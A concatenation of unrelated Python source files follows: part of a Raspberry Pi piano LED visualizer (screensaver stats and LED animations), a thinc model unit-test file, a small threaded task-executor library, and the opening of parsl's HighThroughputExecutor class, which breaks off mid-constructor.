(expected {:.2f})'.format(time.time() - t0, length)) # saving.is_playing_midi = False except: menu.render_message(song_path, "Can't play this file", 2000) saving.is_playing_midi.clear() def screensaver(menu, midiports, saving, ledstrip): KEY2 = 20 GPIO.setup(KEY2, GPIO.IN, GPIO.PUD_UP) delay = 0.1 interval = 3 / float(delay) i = 0 cpu_history = [None] * int(interval) cpu_chart = [0] * 28 cpu_average = 0 upload = 0 download = 0 upload_start = 0 download_start = 0 local_ip = 0 if menu.screensaver_settings["local_ip"] == "1": local_ip = get_ip_address() try: midiports.inport.poll() except: pass while True: if (time.time() - saving.start_time) > 3600 and delay < 0.5 and menu.screensaver_is_running == False: delay = 0.9 interval = 5 / float(delay) cpu_history = [None] * int(interval) cpu_average = 0 i = 0 if int(menu.screen_off_delay) > 0 and ((time.time() - saving.start_time) > (int(menu.screen_off_delay) * 60)): menu.screen_status = 0 GPIO.output(24, 0) if int(menu.led_animation_delay) > 0 and ((time.time() - saving.start_time) > ( int(menu.led_animation_delay) * 60)) and menu.screensaver_is_running == False: menu.screensaver_is_running = True if menu.led_animation == "Theater Chase": menu.t = threading.Thread(target=theaterChase, args=(ledstrip.strip, 1)) menu.t.start() if menu.led_animation == "Breathing Slow": menu.t = threading.Thread(target=breathing, args=(ledstrip.strip, 25)) menu.t.start() if menu.led_animation == "Rainbow Slow": menu.t = threading.Thread(target=rainbow, 
args=(ledstrip.strip, 10)) menu.t.start() if menu.led_animation == "Rainbow Cycle Slow": menu.t = threading.Thread(target=rainbowCycle, args=(ledstrip.strip, 10)) menu.t.start() if menu.led_animation == "Theater Chase Rainbow": menu.t = threading.Thread(target=theaterChaseRainbow, args=(ledstrip.strip, 5)) menu.t.start() if menu.led_animation == "Sound of da police": menu.t = threading.Thread(target=sound_of_da_police, args=(ledstrip.strip, 1)) menu.t.start() if menu.led_animation == "Scanner": menu.t = threading.Thread(target=scanner, args=(ledstrip.strip, 1)) menu.t.start() hour = datetime.datetime.now().strftime("%H:%M:%S") date = datetime.datetime.now().strftime("%d-%m-%Y") cpu_usage = psutil.cpu_percent() cpu_history[i] = cpu_usage cpu_chart.append(cpu_chart.pop(0)) cpu_chart[27] = cpu_usage if i >= (int(interval) - 1): i = 0 try: cpu_average = sum(cpu_history) / (float(len(cpu_history) + 1)) last_cpu_average = cpu_average except: cpu_average = last_cpu_average if menu.screensaver_settings["ram"] == "1": ram_usage = psutil.virtual_memory()[2] else: ram_usage = 0 if menu.screensaver_settings["temp"] == "1": try: temp = find_between(str(psutil.sensors_temperatures()["cpu_thermal"]), "current=", ",") except: temp = find_between(str(psutil.sensors_temperatures()["cpu-thermal"]), "current=", ",") temp = round(float(temp), 1) else: temp = 0 if menu.screensaver_settings["network_usage"] == "1": upload_end = psutil.net_io_counters().bytes_sent download_end = psutil.net_io_counters().bytes_recv if upload_start: upload = upload_end - upload_start upload = upload * (1 / delay) upload = upload / 1000000 upload = round(upload, 2) if download_start: download = download_end - download_start download = download * (1 / delay) download = download / 1000000 download = round(download, 2) upload_start = upload_end download_start = download_end else: upload = 0 download = 0 if menu.screensaver_settings["sd_card_space"] == "1": card_space = psutil.disk_usage('/') else: card_space = 0 menu.render_screensaver(hour, date, cpu_usage, round(cpu_average, 1), ram_usage, temp, cpu_chart, upload, download, card_space, local_ip) time.sleep(delay) i += 1 try: if str(midiports.inport.poll()) != "None": menu.screensaver_is_running = False saving.start_time = time.time() menu.screen_status = 1 GPIO.output(24, 1) menu.show() midiports.reconnect_ports() midiports.last_activity = time.time() break except: pass if GPIO.input(KEY2) == 0: menu.screensaver_is_running = False saving.start_time = time.time() menu.screen_status = 1 GPIO.output(24, 1) menu.show() midiports.reconnect_ports() break # Get note position on the strip def get_note_position(note, ledstrip): if note > 92: note_offset = 2 elif note > 55: note_offset = 1 else: note_offset = 0 note_offset -= ledstrip.shift note_pos_raw = (note - 20) - note_offset if ledstrip.reverse: return max(0, ledstrip.led_number - note_pos_raw) else: return max(0, note_pos_raw) # scale: 1 means in C, scale: 2 means in C#, scale: 3 means in D, etc... 
def get_scale_color(scale, note_position, ledsettings): notes_in_scale = [0, 2, 4, 5, 7, 9, 11] scale = int(scale) note_position = (note_position - scale) % 12 if note_position in notes_in_scale: return list(ledsettings.key_in_scale.values()) else: return list(ledsettings.key_not_in_scale.values()) def get_rainbow_colors(pos, color): pos = int(pos) if pos < 85: if color == "green": return pos * 3 elif color == "red": return 255 - pos * 3 elif color == "blue": return 0 elif pos < 170: pos -= 85 if color == "green": return 255 - pos * 3 elif color == "red": return 0 elif color == "blue": return pos * 3 else: pos -= 170 if color == "green": return 0 elif color == "red": return pos * 3 elif color == "blue": return 255 - pos * 3 # LED animations def fastColorWipe(strip, update, ledsettings): brightness = ledsettings.backlight_brightness_percent / 100 red = int(ledsettings.get_backlight_color("Red") * brightness) green = int(ledsettings.get_backlight_color("Green") * brightness) blue = int(ledsettings.get_backlight_color("Blue") * brightness) color = Color(green, red, blue) for i in range(strip.numPixels()): strip.setPixelColor(i, color) if update: strip.show() def theaterChase(strip, color, ledsettings, menu, wait_ms=25): """Movie theater light style chaser animation.""" menu.screensaver_is_running = False time.sleep(0.5) if menu.screensaver_is_running: return menu.t = threading.currentThread() j = 0 menu.screensaver_is_running = True while menu.screensaver_is_running: red = int(ledsettings.get_color("Red")) green = int(ledsettings.get_color("Green")) blue = int(ledsettings.get_color("Blue")) for q in range(5): for i in range(0, strip.numPixels(), 5): strip.setPixelColor(i + q, Color(green, red, blue)) strip.show() time.sleep(wait_ms / 1000.0) for i in range(0, strip.numPixels(), 5): strip.setPixelColor(i + q, 0) j += 1 if j > 256: j = 0 menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def wheel(pos): """Generate rainbow colors across 0-255 positions.""" if pos < 85: return Color(pos * 3, 255 - pos * 3, 0) elif pos < 170: pos -= 85 return Color(255 - pos * 3, 0, pos * 3) else: pos -= 170 return Color(0, pos * 3, 255 - pos * 3) def rainbow(strip, ledsettings, menu, wait_ms=20): """Draw rainbow that fades across all pixels at once.""" menu.screensaver_is_running = False time.sleep(0.2) if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() j = 0 menu.screensaver_is_running = True while menu.screensaver_is_running: for i in range(strip.numPixels()): strip.setPixelColor(i, wheel(j & 255)) j += 1 if j >= 256: j = 0 strip.show() time.sleep(wait_ms / 1000.0) menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def rainbowCycle(strip, ledsettings, menu, wait_ms=20): """Draw rainbow that uniformly distributes itself across all pixels.""" menu.screensaver_is_running = False time.sleep(0.2) if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() j = 0 menu.screensaver_is_running = True while menu.screensaver_is_running: for i in range(strip.numPixels()): strip.setPixelColor(i, wheel((int(i * 256 / strip.numPixels()) + j) & 255)) j += 1 if j >= 256: j = 0 strip.show() time.sleep(wait_ms / 1000.0) menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def theaterChaseRainbow(strip, ledsettings, menu, wait_ms=25): """Rainbow movie theater light style chaser animation.""" menu.screensaver_is_running = False time.sleep(0.5) 
if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() j = 0 menu.screensaver_is_running = True while menu.screensaver_is_running: for q in range(5): for i in range(0, strip.numPixels(), 5): strip.setPixelColor(i + q, wheel((i + j) % 255)) strip.show() time.sleep(wait_ms / 1000.0) for i in range(0, strip.numPixels(), 5): strip.setPixelColor(i + q, 0) j += 1 if j > 256: j = 0 menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def breathing(strip, ledsettings, menu, wait_ms=2): menu.screensaver_is_running = False time.sleep(0.1) if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() menu.screensaver_is_running = True multiplier = 24 direction = 2 while menu.screensaver_is_running: if multiplier >= 98 or multiplier < 24: direction *= -1 multiplier += direction divide = multiplier / float(100) red = int(round(float(ledsettings.get_color("Red")) * float(divide))) green = int(round(float(ledsettings.get_color("Green")) * float(divide))) blue = int(round(float(ledsettings.get_color("Blue")) * float(divide))) for i in range(strip.numPixels()): strip.setPixelColor(i, Color(green, red, blue)) strip.show() if wait_ms > 0: time.sleep(wait_ms / 1000.0) menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def sound_of_da_police(strip, ledsettings, menu, wait_ms=5): menu.screensaver_is_running = False time.sleep(0.1) if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() menu.screensaver_is_running = True middle = strip.numPixels() / 2 r_start = 0 l_start = 196 while menu.screensaver_is_running: r_start += 14 l_start -= 14 for i in range(strip.numPixels()): if (i > middle) and i > r_start and i < (r_start + 40): strip.setPixelColor(i, Color(0, 255, 0)) elif (i < middle) and i < l_start and i > (l_start - 40): strip.setPixelColor(i, Color(0, 0, 255)) else: strip.setPixelColor(i, Color(0, 0, 0)) if r_start > 150: r_start = 0 l_start = 175 strip.show() time.sleep(wait_ms / 1000.0) menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings) def scanner(strip, ledsettings, menu, wait_ms=1): menu.screensaver_is_running = False time.sleep(0.1) if menu.screensaver_is_running: return fastColorWipe(strip, True, ledsettings) menu.t = threading.currentThread() menu.screensaver_is_running = True position = 0 direction = 3 scanner_length = 20 red_fixed = ledsettings.get_color("Red") green_fixed = ledsettings.get_color("Green") blue_fixed = ledsettings.get_color("Blue") while menu.screensaver_is_running: position += direction for i in range(strip.numPixels()): if i > (position - scanner_length) and i < (position + scanner_length): distance_from_position = position - i if distance_from_position < 0: distance_from_position *= -1 divide = ((scanner_length / 2) - distance_from_position) / float(scanner_length / 2) red = int(float(red_fixed) * float(divide)) green = int(float(green_fixed) * float(divide)) blue = int(float(blue_fixed) * float(divide)) if divide > 0: strip.setPixelColor(i, Color(green, red, blue)) else: strip.setPixelColor(i, Color(0, 0, 0)) if position >= strip.numPixels() or position <= 1: direction *= -1 strip.show() time.sleep(wait_ms / 1000.0) menu.screensaver_is_running = False fastColorWipe(strip, True, ledsettings)
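# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): how get_note_position()
# maps a MIDI note number onto an LED index.  "LedstripStub" is a hypothetical
# stand-in for the real ledstrip object; only the attributes the function
# actually reads (shift, reverse, led_number) are provided.
class LedstripStub:
    def __init__(self, shift=0, reverse=False, led_number=176):
        self.shift = shift
        self.reverse = reverse
        self.led_number = led_number

def _note_position_demo():
    strip = LedstripStub()
    # Middle C (MIDI 60) is above the first offset break (note > 55), so one
    # LED is subtracted: (60 - 20) - 1 = 39.
    assert get_note_position(60, strip) == 39
    # The lowest piano key (MIDI 21) gets no offset: (21 - 20) - 0 = 1.
    assert get_note_position(21, strip) == 1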
test_model.py
# encoding: utf8 from __future__ import unicode_literals import tempfile import os import pytest import threading import time from thinc.neural._classes import model as base from thinc.neural.ops import NumpyOps @pytest.fixture def model_with_no_args(): model = base.Model() return model def test_Model_defaults_to_name_model(model_with_no_args): assert model_with_no_args.name == "model" def test_changing_instance_name_doesnt_change_class_name(): model = base.Model() assert model.name != "changed" model.name = "changed" model2 = base.Model() assert model2.name != "changed" def test_changing_class_name_doesnt_change_default_instance_name(): model = base.Model() assert model.name != "changed" base.Model.name = "changed" assert model.name != "changed" # Reset state base.Model.name = "model" def test_changing_class_name_doesnt_changes_nondefault_instance_name(): model = base.Model(name="nondefault") assert model.name == "nondefault" base.Model.name = "changed" assert model.name == "nondefault" def test_Model_defaults_to_cpu(model_with_no_args): assert isinstance(model_with_no_args.ops, NumpyOps) def test_models_get_different_ids(model_with_no_args): model1 = base.Model() model2 = base.Model() assert model1.id != model2.id def test_init_assigns_attributes(): model = base.Model() model._mem assert model._layers == [] def test_init_installs_via_descriptions(): def mock_install(attr, self): setattr(self, attr, "model=" + self.name) base.Model.descriptions = [("myattr", mock_install)] model = base.Model(name="model1") assert model.myattr == "model=%s" % "model1" model2 = base.Model(name="model2") assert model2.myattr == "model=%s" % "model2" def test_init_calls_hooks(): def mock_init_hook(self, *args, **kwargs): setattr(self, "hooked", (args, kwargs)) base.Model.on_init_hooks = [mock_init_hook] model = base.Model(0, 1, 2) assert model.hooked == ((0, 1, 2), {}) model2 = base.Model(value="something") assert model2.hooked == (tuple(), {"value": "something"}) def test_use_device(): dev_id = id(base.Model.ops) with base.Model.use_device(base.Model.ops.device): assert id(base.Model.ops) == dev_id with base.Model.use_device("gpu"): assert id(base.Model.ops) != dev_id assert id(base.Model.ops) == dev_id def test_bind_plus(): with base.Model.define_operators({"+": lambda a, b: (a.name, b.name)}): m = base.Model(name="a") + base.Model(name="b") assert m == ("a", "b") def test_plus_chain(): with base.Model.define_operators({"+": lambda a, b: a}): m = ( base.Model(name="a") + base.Model(name="b") + base.Model(name="c") + base.Model(name="d") ) assert m.name == "a" def test_overload_operators_in_subthread(): """Test we can create a model in a child thread with overloaded operators.""" # Worker1 will start and run, while worker 2 sleeps after Model.define_operators. # Without thread-safety, worker2 will find that its operator definitions # have been removed, causing an error. 
worker1 = threading.Thread(target=_overload_plus, args=("+", 0)) worker2 = threading.Thread(target=_overload_plus, args=("*", 1,)) worker2.start() worker1.start() worker1.join() worker2.join() worker1 = threading.Thread(target=_overload_plus, args=("+", 1)) worker2 = threading.Thread(target=_overload_plus, args=("*", 0,)) worker2.start() worker1.start() worker1.join() worker2.join() def _overload_plus(operator, sleep): m1 = base.Model(name="a") m2 = base.Model(name="b") with base.Model.define_operators({operator: lambda a, b: a.name + b.name}): time.sleep(sleep) if operator == "+": value = m1 + m2 else: value = m1 * m2 assert value == "ab" assert base.Model._thread_local.operators == {} def test_nested_operator_contexts(): operator = "+" m1 = base.Model(name="a") m2 = base.Model(name="b") assert base.Model._thread_local.operators == {} with base.Model.define_operators({"+": lambda a, b: a.name + b.name}): value = m1 + m2 with pytest.raises(TypeError): value = m1 * m2 with base.Model.define_operators({"*": lambda a, b: a.name + b.name}): with pytest.raises(TypeError): value = m1 + m2 value = m1 * m2 with base.Model.define_operators({"-": lambda a, b: a.name + b.name}): with pytest.raises(TypeError): value = m1 + m2 value = m1 - m2 with pytest.raises(TypeError): value = m1 + m2 value = m1 * m2 value = m1 + m2 with pytest.raises(TypeError): value = m1 * m2 assert value == "ab" assert base.Model._thread_local.operators == {} @pytest.mark.parametrize("op", "+ - * @ / // % ** << >> & ^ |".split()) def test_all_operators(op): m1 = base.Model(name="a") m2 = base.Model(name="b") with base.Model.define_operators({op: lambda a, b: a.name + b.name}): if op == "+": value = m1 + m2 else: with pytest.raises(TypeError): value = m1 + m2 if op == "-": value = m1 - m2 else: with pytest.raises(TypeError): value = m1 - m2 if op == "*": value = m1 * m2 else: with pytest.raises(TypeError): value = m1 * m2 if op == "@": value = m1.__matmul__(m2) # Be kind to Python 2... else: with pytest.raises(TypeError): value = m1.__matmul__(m2) if op == "/": value = m1 / m2 else: with pytest.raises(TypeError): value = m1 / m2 if op == "//": value = m1 // m2 else: with pytest.raises(TypeError): value = m1 // m2 if op == "^": value = m1 ^ m2 else: with pytest.raises(TypeError): value = m1 ^ m2 if op == "%": value = m1 % m2 else: with pytest.raises(TypeError): value = m1 % m2 if op == "**": value = m1 ** m2 else: with pytest.raises(TypeError): value = m1 ** m2 if op == "<<": value = m1 << m2 else: with pytest.raises(TypeError): value = m1 << m2 if op == ">>": value = m1 >> m2 else: with pytest.raises(TypeError): value = m1 >> m2 if op == "&": value = m1 & m2 else: with pytest.raises(TypeError): value = m1 & m2 if op == "^": value = m1 ^ m2 else: with pytest.raises(TypeError): value = m1 ^ m2 if op == "|": value = m1 | m2 else: with pytest.raises(TypeError): value = m1 | m2 # noqa: F841 assert base.Model._thread_local.operators == {} def test_model_can_save_to_disk(model_with_no_args): temp_file = os.path.join(tempfile.mkdtemp(), "thinc_model") model_with_no_args.to_disk(temp_file) def test_model_can_load_from_disk(model_with_no_args): temp_file = os.path.join(tempfile.mkdtemp(), "thinc_model") model_with_no_args.to_disk(temp_file) m2 = model_with_no_args.from_disk(temp_file) assert model_with_no_args.to_bytes() == m2.to_bytes()
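# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the test module): the operator-overloading
# pattern these tests exercise.  Inside the define_operators() context the
# chosen operators are bound on Model instances; once the context exits the
# thread-local operator table is empty again, so - as the nested-context test
# above implies - using an undefined operator raises TypeError.
def _define_operators_demo():
    m1 = base.Model(name="a")
    m2 = base.Model(name="b")
    with base.Model.define_operators({">>": lambda a, b: (a.name, b.name)}):
        assert (m1 >> m2) == ("a", "b")
    with pytest.raises(TypeError):
        m1 >> m2  # no operators defined outside the context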
__init__.py
# MIT License # Copyright (c) 2020 Filip Kofron # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import threading, queue from typing import Callable, List from functools import partial # TODO: Offer tasks without continuations, continuations via the executor and allow functions without executor in argument. class Task: """ Represents a work schedulable in an executor. - A task can only be executed once, but it can create continuations as well as define dependencies. - A continuation as a task becomes a dependency of other tasks depending on the original task. - Any task created needs to be manually executed in an executor. Task execution provides the current executor as its parameter. """ def __init__(self, work: Callable[["Executor"], List["Task"]], dependencies: List["Task"] = []): self.lock = threading.Lock() self.work = work self.being_executed = False self.done = False self.scheduled_executor_callback = None self.continuations = [] self.dependencies = [] self.dependants : List[Task] = [] self.dependencies_done = 0 self.__add_dependencies(dependencies) def execute(self, executor: "Executor") -> None: """ Executes this task. Can only be done once and after all dependencies are satisfied. """ if self.done: raise Exception("Task already executed") if self.being_executed: raise Exception("Task is already being executed") self.being_executed = True if len(self.dependencies) != self.dependencies_done: raise Exception("Dependencies not satisfied") # Actual execution continuations = self.work(executor) # All dependants need to add continuations as their dependencies if len(continuations) > 0: with self.lock: self.continuations = continuations for dependant in self.dependants: dependant.__add_dependencies(self.continuations) # All is clear, we can signal that we are finished to all dependants with self.lock: for dependant in self.dependants: dependant.__notify_done(self) self.done = True # Task is officially done def on_schedule(self, callback: Callable[["Task"], None]) -> bool: """ Returns whether this task has satisfied dependencies to be executed. If not, callback to schedule it again during dependency satisfaction is stored. 
""" with self.lock: if self.scheduled_executor_callback != None: raise Exception("Task has already been scheduled once!") if self.done: raise Exception("Task already executed!") if len(self.dependencies) > self.dependencies_done: self.scheduled_executor_callback = callback return False return True def __add_dependencies(self, dependencies: List["Task"]) -> None: with self.lock: for dependency in dependencies: if dependency.__try_add_dependants([self]): self.dependencies.append(dependency) def __try_add_dependants(self, dependants: List["Task"]) -> bool: with self.lock: if self.done: return False self.dependants.extend(dependants) return True def __notify_done(self, dependency: "Task") -> None: with self.lock: self.dependencies_done += 1 if self.dependencies_done == len(self.dependencies): self.scheduled_executor_callback(self) self.scheduled_executor_callback = lambda task: None class Executor: """ A task queue and a thread pool for processing the queue. Offers a manual mode. """ def __init__(self, n_threads = -1, manual_execution = False): self.queue = queue.Queue() self.canceled = False self.joining = False self.manual_execution = manual_execution if n_threads == -1 and not self.manual_execution: n_threads = threading.active_count() elif n_threads <= 0 and not self.manual_execution: raise Exception(f"Incorrect number of threads: {n_threads}") if self.manual_execution and n_threads > 0: raise Exception("There should be no threads during manual execution") self.threads = [] for i in range(n_threads): thread = threading.Thread(target=self.__threadFunc) thread.start() self.threads.append(thread) def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.wait_until_tasks_done() self.join() def schedule_task(self, task: Task) -> None: """ Schedule task for execution now or later when its dependencies are satisfied. Can only be done once for the given task. """ if self.joining: raise Exception("No task can be scheduled during joining.") if task.on_schedule(self.__wake_callback): self.queue.put(task) def schedule_func(self, function, *args) -> Task: """ Schedules function as a task with no depencencies and returns the task. """ return self.schedule_func_with_deps(function, [], *args) def schedule_func_with_deps(self, function, dependencies: List[Task], *args) -> Task: """ Schedule task with given dependencies. Task will only be executed after all dependencies have been satisfied. Can only be done once for the given task. """ task = Task(partial(function, *args), dependencies) self.schedule_task(task) return task def make_task(self, function, *args): """ Returns a new unscheduled task from the function and given arguments. """ return self.make_task_with_deps(function, [], *args) def make_task_with_deps(self, function, dependencies: List[Task], *args): """ Returns a new unscheduled task from the function, dependencies and given arguments. 
""" return Task(partial(function, *args), dependencies) def __wake_callback(self, task: Task): self.queue.put(task) def __execute_single(self) -> bool: task_exception = None try: # TODO: configurable timeout timeout = 0.2 if self.manual_execution: timeout = 0 task = self.queue.get(timeout=timeout) try: task.execute(self) except Exception as e: task_exception = e self.queue.task_done() except: pass if task_exception: raise task_exception return self.queue.qsize() > 0 def __threadFunc(self): while not self.canceled: self.__execute_single() if self.joining and self.queue.qsize() == 0: break def manual_execute(self) -> bool: """ For executor in manual mode, execute a single task. Returns whether there are any remaining tasks in queue. Thread-safe. """ if not self.manual_execution: raise Exception("Executor not in manual mode!") return self.__execute_single() def join(self): """ Wait for all tasks to be done and causes all threads in the executor to finish and join. No task can be scheduled at this point.""" self.wait_until_tasks_done() self.joining = True for thread in self.threads: wake_task = Task(lambda executor: []) self.queue.put(wake_task) for thread in self.threads: thread.join() def wait_until_tasks_done(self): """ Blocks a thread until the queue is """ self.queue.join() def cancel(self): """ Stop processing new tasks (possibly leaving unfinished ones on the queue) and join all threads. """ self.canceled = True while self.queue.qsize() > 0: try: # TODO: configurable timeout timeout = 0.2 self.queue.get(timeout=timeout) self.queue.task_done() except: pass self.join() class Result: """ Represents a value, which can either have a set value or an exception to be raised upon retrieval of the value. """ def __init__(self): self.__value = None self.__result_set = False self.__exception = None def set_value(self, value): """ Set the result value. Can only be called once. """ if self.__result_set: raise Exception("Result already set") self.__value = value self.__result_set = True def set_exception(self, exception): if self.__exception != None: raise Exception("Exception already set") self.__exception = exception self.__result_set = True def retrieve_result(self): if not self.__result_set: raise Exception("Result wasn't set") if self.__exception: raise self.__exception return self.__value class AsyncResult: """ Binds result and its task creating an asynchronous result. Use a new task on any executor with dependency to this result to retrieve the value. """ def __init__(self, result: Result, task: Task): self.result = result self.task = task # TODO: Offer retrieval using blocking operation (temporary executor) (using dependency notificaiton?) def retrieve_result(self): if not self.task.done: raise Exception("Task wasn't yet executed") return self.result.retrieve_result() # TODO: Delete, this functionality should be provided natively by executor. def wrap_async_task(funcTask, *args) -> AsyncResult: """ Helper (to be deprecated) for wrapping a function taking result and executor and creating AsyncResult out of it. The function is responsible to set the result. """ result = Result() task = Task(partial(funcTask, *args, result)) return AsyncResult(result, task) # TODO: Accept async results natively in the executor def async_deps(list: List[AsyncResult]) -> List[Task]: """ Helper (to be deprecated) to extract task list from multiple async results. """ return [result.task for result in list]
executor.py
from concurrent.futures import Future import typeguard import logging import threading import queue import pickle from multiprocessing import Process, Queue from typing import Dict, List, Optional, Tuple, Union import math from ipyparallel.serialize import pack_apply_message from ipyparallel.serialize import deserialize_object from parsl.app.errors import RemoteExceptionWrapper from parsl.executors.high_throughput import zmq_pipes from parsl.executors.high_throughput import interchange from parsl.executors.errors import ( BadMessage, ScalingFailed, DeserializationError, SerializationError, UnsupportedFeatureError ) from parsl.executors.status_handling import StatusHandlingExecutor from parsl.providers.provider_base import ExecutionProvider from parsl.data_provider.staging import Staging from parsl.addresses import get_all_addresses from parsl.utils import RepresentationMixin from parsl.providers import LocalProvider logger = logging.getLogger(__name__) BUFFER_THRESHOLD = 1024 * 1024 ITEM_THRESHOLD = 1024 class HighThroughputExecutor(StatusHandlingExecutor, RepresentationMixin): """Executor designed for cluster-scale The HighThroughputExecutor system has the following components: 1. The HighThroughputExecutor instance which is run as part of the Parsl script. 2. The Interchange which is acts as a load-balancing proxy between workers and Parsl 3. The multiprocessing based worker pool which coordinates task execution over several cores on a node. 4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool Here is a diagram .. code:: python | Data | Executor | Interchange | External Process(es) | Flow | | | Task | Kernel | | | +----->|-------->|------------>|->outgoing_q---|-> process_worker_pool | | | | batching | | | Parsl<---Fut-| | | load-balancing| result exception ^ | | | watchdogs | | | | | | Q_mngmnt | | V V | | | Thread<--|-incoming_q<---|--- +---------+ | | | | | | | | | | | | +----update_fut-----+ Each of the workers in each process_worker_pool has access to its local rank through an environmental variable, ``PARSL_WORKER_RANK``. The local rank is unique for each process and is an integer in the range from 0 to the number of workers per in the pool minus 1. The workers also have access to the ID of the worker pool as ``PARSL_WORKER_POOL_ID`` and the size of the worker pool as ``PARSL_WORKER_COUNT``. Parameters ---------- provider : :class:`~parsl.providers.provider_base.ExecutionProvider` Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`, :class:`~parsl.providers.cobalt.cobalt.Cobalt`, :class:`~parsl.providers.condor.condor.Condor`, :class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`, :class:`~parsl.providers.gridEngine.gridEngine.GridEngine`, :class:`~parsl.providers.jetstream.jetstream.Jetstream`, :class:`~parsl.providers.local.local.Local`, :class:`~parsl.providers.sge.sge.GridEngine`, :class:`~parsl.providers.slurm.slurm.Slurm`, or :class:`~parsl.providers.torque.torque.Torque`. label : str Label for this executor instance. launch_cmd : str Command line string to launch the process_worker_pool from the provider. The command line string will be formatted with appropriate values for the following values (debug, task_url, result_url, cores_per_worker, nodes_per_block, heartbeat_period ,heartbeat_threshold, logdir). 
For example: launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}" address : string An address to connect to the main Parsl process which is reachable from the network in which workers will be running. This can be either a hostname as returned by `hostname` or an IP address. Most login nodes on clusters have several network interfaces available, only some of which can be reached from the compute nodes. By default, the executor will attempt to enumerate and connect through all possible addresses. Setting an address here overrides the default behavior. default=None worker_ports : (int, int) Specify the ports to be used by workers to connect to Parsl. If this option is specified, worker_port_range will not be honored. worker_port_range : (int, int) Worker ports will be chosen between the two integers provided. interchange_port_range : (int, int) Port range used by Parsl to communicate with the Interchange. working_dir : str Working dir to be used by the executor. worker_debug : Bool Enables worker debug logging. managed : Bool If this executor is managed by the DFK or externally handled. cores_per_worker : float cores to be assigned to each worker. Oversubscription is possible by setting cores_per_worker < 1.0. Default=1 mem_per_worker : float GB of memory required per worker. If this option is specified, the node manager will check the available memory at startup and limit the number of workers such that the there's sufficient memory for each worker. Default: None max_workers : int Caps the number of workers launched by the manager. Default: infinity prefetch_capacity : int Number of tasks that could be prefetched over available worker capacity. When there are a few tasks (<100) or when tasks are long running, this option should be set to 0 for better load balancing. Default is 0. address_probe_timeout : int | None Managers attempt connecting over many different addesses to determine a viable address. This option sets a time limit in seconds on the connection attempt. Default of None implies 30s timeout set on worker. heartbeat_threshold : int Seconds since the last message from the counterpart in the communication pair: (interchange, manager) after which the counterpart is assumed to be un-available. Default: 120s heartbeat_period : int Number of seconds after which a heartbeat message indicating liveness is sent to the counterpart (interchange, manager). Default: 30s poll_period : int Timeout period to be used by the executor components in milliseconds. Increasing poll_periods trades performance for cpu efficiency. Default: 10ms worker_logdir_root : string In case of a remote file system, specify the path to where logs will be kept. 
""" @typeguard.typechecked def __init__(self, label: str = 'HighThroughputExecutor', provider: ExecutionProvider = LocalProvider(), launch_cmd: Optional[str] = None, address: Optional[str] = None, worker_ports: Optional[Tuple[int, int]] = None, worker_port_range: Optional[Tuple[int, int]] = (54000, 55000), interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000), storage_access: Optional[List[Staging]] = None, working_dir: Optional[str] = None, worker_debug: bool = False, cores_per_worker: float = 1.0, mem_per_worker: Optional[float] = None, max_workers: Union[int, float] = float('inf'), prefetch_capacity: int = 0, heartbeat_threshold: int = 120, heartbeat_period: int = 30, poll_period: int = 10, address_probe_timeout: Optional[int] = None, managed: bool = True, worker_logdir_root: Optional[str] = None): logger.debug("Initializing HighThroughputExecutor") StatusHandlingExecutor.__init__(self, provider) self.label = label self.launch_cmd = launch_cmd self.worker_debug = worker_debug self.storage_access = storage_access self.working_dir = working_dir self.managed = managed self.blocks = {} # type: Dict[str, str] self.cores_per_worker = cores_per_worker self.mem_per_worker = mem_per_worker self.max_workers = max_workers self.prefetch_capacity = prefetch_capacity self.address = address self.address_probe_timeout = address_probe_timeout if self.address: self.all_addresses = address else: self.all_addresses = ','.join(get_all_addresses()) mem_slots = max_workers cpu_slots = max_workers if hasattr(self.provider, 'mem_per_node') and \ self.provider.mem_per_node is not None and \ mem_per_worker is not None and \ mem_per_worker > 0: mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker) if hasattr(self.provider, 'cores_per_node') and \ self.provider.cores_per_node is not None: cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker) self.workers_per_node = min(max_workers, mem_slots, cpu_slots) if self.workers_per_node == float('inf'): self.workers_per_node = 1 # our best guess-- we do not have any provider hints self._task_counter = 0 self.hub_address = None # set to the correct hub address in dfk self.hub_port = None # set to the correct hub port in dfk self.worker_ports = worker_ports self.worker_port_range = worker_port_range self.interchange_port_range = interchange_port_range self.heartbeat_threshold = heartbeat_threshold self.heartbeat_period = heartbeat_period 